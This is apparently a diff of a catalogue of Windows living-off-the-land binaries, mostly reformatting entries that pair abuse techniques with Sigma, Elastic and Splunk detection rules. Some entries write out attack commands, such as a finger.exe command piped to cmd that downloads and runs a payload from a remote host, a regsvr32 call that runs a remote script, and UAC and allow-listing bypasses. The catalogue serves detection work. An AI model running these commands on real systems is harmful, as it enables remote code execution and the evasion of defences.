|   - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
|   - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ | ||||
| @@ -66,5 +66,4 @@ Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Mike Cary | ||||
|     Handle: 'grayfold3d' | ||||
| --- | ||||
|     Handle: '@grayfold3d' | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: eventvwr.exe | ||||
|     Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Category: UAC Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -31,4 +31,3 @@ Acknowledgement: | ||||
|     Handle: '@enigma0x3' | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -29,10 +29,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   - Path: C:\Windows\SysWOW64\Expand.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| @@ -41,4 +41,3 @@ Acknowledgement: | ||||
|     Handle: '@infosecn1nja' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -37,4 +37,3 @@ Acknowledgement: | ||||
|     Handle: '@CyberRaiju' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Extexport.exe | ||||
| Description: | ||||
| Description: Load a DLL located in the c:\test folder with a specific name. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -15,7 +15,7 @@ Full_Path: | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml | ||||
|   - IOC: Extexport.exe loads dll and is execute from other folder the original path | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Extrac32.exe | ||||
| Description: | ||||
| Description: Extract to ADS, copy or overwrite a file with Extrac32.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -38,9 +38,9 @@ Full_Path: | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml | ||||
| Resources: | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| @@ -54,4 +54,3 @@ Acknowledgement: | ||||
|     Handle: '@VakninHai' | ||||
|   - Person: Tamir Yehuda | ||||
|     Handle: '@tim8288' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Findstr.exe | ||||
| Description: | ||||
| Description: Write to ADS, discover, or download files with Findstr.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -36,13 +36,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   - Path: C:\Windows\SysWOW64\findstr.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml | ||||
| Resources: | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -1,31 +1,30 @@ | ||||
| --- | ||||
| Name: Finger.exe | ||||
| Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon | ||||
| Author: Ruben Revuelta | ||||
| Created: 2021-08-30 | ||||
| Commands: | ||||
|   - Command: finger user@example.host.com | more +2 | cmd | ||||
|     Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' | ||||
|     Usecase: Download malicious payload | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   - Path: c:\windows\syswow64\finger.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml | ||||
|   - IOC: finger.exe should not be run on a normal workstation. | ||||
|   - IOC: finger.exe connecting to external resources. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/DissectMalware/status/997340270273409024 | ||||
|   - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) | ||||
| Acknowledgement: | ||||
|   - Person: Ruben Revuelta (MAPFRE CERT) | ||||
|     Handle: '@rubn_RB' | ||||
|   - Person: Jose A. Jimenez (MAPFRE CERT) | ||||
|     Handle: '@Ocelotty6669' | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
| --- | ||||
| --- | ||||
| Name: Finger.exe | ||||
| Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon | ||||
| Author: Ruben Revuelta | ||||
| Created: 2021-08-30 | ||||
| Commands: | ||||
|   - Command: finger user@example.host.com | more +2 | cmd | ||||
|     Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' | ||||
|     Usecase: Download malicious payload | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   - Path: c:\windows\syswow64\finger.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml | ||||
|   - IOC: finger.exe should not be run on a normal workstation. | ||||
|   - IOC: finger.exe connecting to external resources. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/DissectMalware/status/997340270273409024 | ||||
|   - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) | ||||
| Acknowledgement: | ||||
|   - Person: Ruben Revuelta (MAPFRE CERT) | ||||
|     Handle: '@rubn_RB' | ||||
|   - Person: Jose A. Jimenez (MAPFRE CERT) | ||||
|     Handle: '@Ocelotty6669' | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Carlos Perez | ||||
|     Handle: '@Carlos_Perez' | ||||
| --- | ||||
|   | ||||
| @@ -22,9 +22,9 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
|   - Path: C:\Windows\SysWOW64\forfiles.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: '@vector_sec' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -22,10 +22,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\ftp.exe | ||||
|   - Path: C:\Windows\SysWOW64\ftp.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml | ||||
|  - IOC: cmd /c as child process of ftp.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml | ||||
|   - IOC: cmd /c as child process of ftp.exe | ||||
| Resources: | ||||
|   - Link: https://twitter.com/0xAmit/status/1070063130636640256 | ||||
|   - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 | ||||
| @@ -37,5 +37,4 @@ Acknowledgement: | ||||
|   - Person: BennyHusted | ||||
|     Handle: '' | ||||
|   - Person: Amit Serper | ||||
|     Handle: '@0xAmit ' | ||||
| --- | ||||
|     Handle: '@0xAmit' | ||||
|   | ||||
| @@ -176,4 +176,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jesus Galvez | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -20,4 +20,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Ie4uinit.exe | ||||
| Description: | ||||
| Description: Executes commands from a specially prepared ie4uinit.inf file. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -17,6 +17,7 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe | ||||
| @@ -32,4 +33,3 @@ Acknowledgement: | ||||
|     Handle: '@VakninHai' | ||||
|   - Person: Lior Adar | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -15,10 +15,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe | ||||
| Code_Sample: | ||||
| - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml | ||||
|  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
| Resources: | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -24,11 +24,11 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
| @@ -39,4 +39,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
| --- | ||||
|   | ||||
| @@ -40,4 +40,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Acknowledgement: | ||||
|     Handle: '@gN3mes1s' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -56,4 +56,3 @@ Acknowledgement: | ||||
|     Handle: '@FortyNorthSec' | ||||
|   - Person: Bank Security | ||||
|     Handle: '@Bank_Security' | ||||
| --- | ||||
|   | ||||
| @@ -22,10 +22,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\mmc.exe | ||||
|   - Path: C:\Windows\SysWOW64\mmc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml | ||||
| Resources: | ||||
|   - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | ||||
|   - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: '@bohops' | ||||
|   - Person: clem | ||||
|     Handle: '@clavoillotte' | ||||
| --- | ||||
|   | ||||
| @@ -53,4 +53,3 @@ Acknowledgement: | ||||
|     Handle: '' | ||||
|   - Person: Cedric | ||||
|     Handle: '@th3c3dr1c' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: msbuild.exe pshell.xml | ||||
|     Description: Build and execute a C# project stored in the target XML file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127.001 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -60,7 +60,7 @@ Detection: | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Msbuild.exe should not normally be executed on workstations | ||||
| Resources: | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md | ||||
| @@ -77,4 +77,3 @@ Acknowledgement: | ||||
|     Handle: '@Cneelis' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -14,7 +14,7 @@ Commands: | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -69,4 +69,3 @@ Acknowledgement: | ||||
|     Handle: '@subtee' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -51,4 +51,3 @@ Acknowledgement: | ||||
|     Handle: '@netbiosX' | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: | ||||
|   - Person: 'Xabier Ugarte-Pedrero' | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Acknowledgement: | ||||
|     Handle: '@subtee' | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -19,4 +19,3 @@ Detection: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -21,4 +21,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -38,4 +38,3 @@ Acknowledgement: | ||||
|     Handle: '@kylehanslovan' | ||||
|   - Person: Fab | ||||
|     Handle: '@0rbz_' | ||||
| --- | ||||
|   | ||||
| @@ -22,4 +22,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -31,4 +31,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Derek Johnson | ||||
|     Handle: '' | ||||
| --- | ||||
|   | ||||
| @@ -13,7 +13,7 @@ Commands: | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\system32\pnputil.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml | ||||
| @@ -22,4 +22,3 @@ Acknowledgement: | ||||
|     Handle: '@LuxNoBulIshit' | ||||
|   - Person: Avihay eldad | ||||
|     Handle: '@aloneliassaf' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -40,4 +40,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -28,4 +28,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Leon Rodenko | ||||
|     Handle: '@L3m0nada' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: FireEye | ||||
|     Handle: '@FireEye' | ||||
| --- | ||||
|   | ||||
| @@ -41,4 +41,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Grzegorz Tworek | ||||
|     Handle: '@0gtweet' | ||||
| --- | ||||
| @@ -36,4 +36,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: regasm.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -38,4 +38,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Eli Salem | ||||
|     Handle: '@elisalem9' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
|   | ||||
| @@ -14,7 +14,7 @@ Commands: | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -7,14 +7,14 @@ Commands: | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
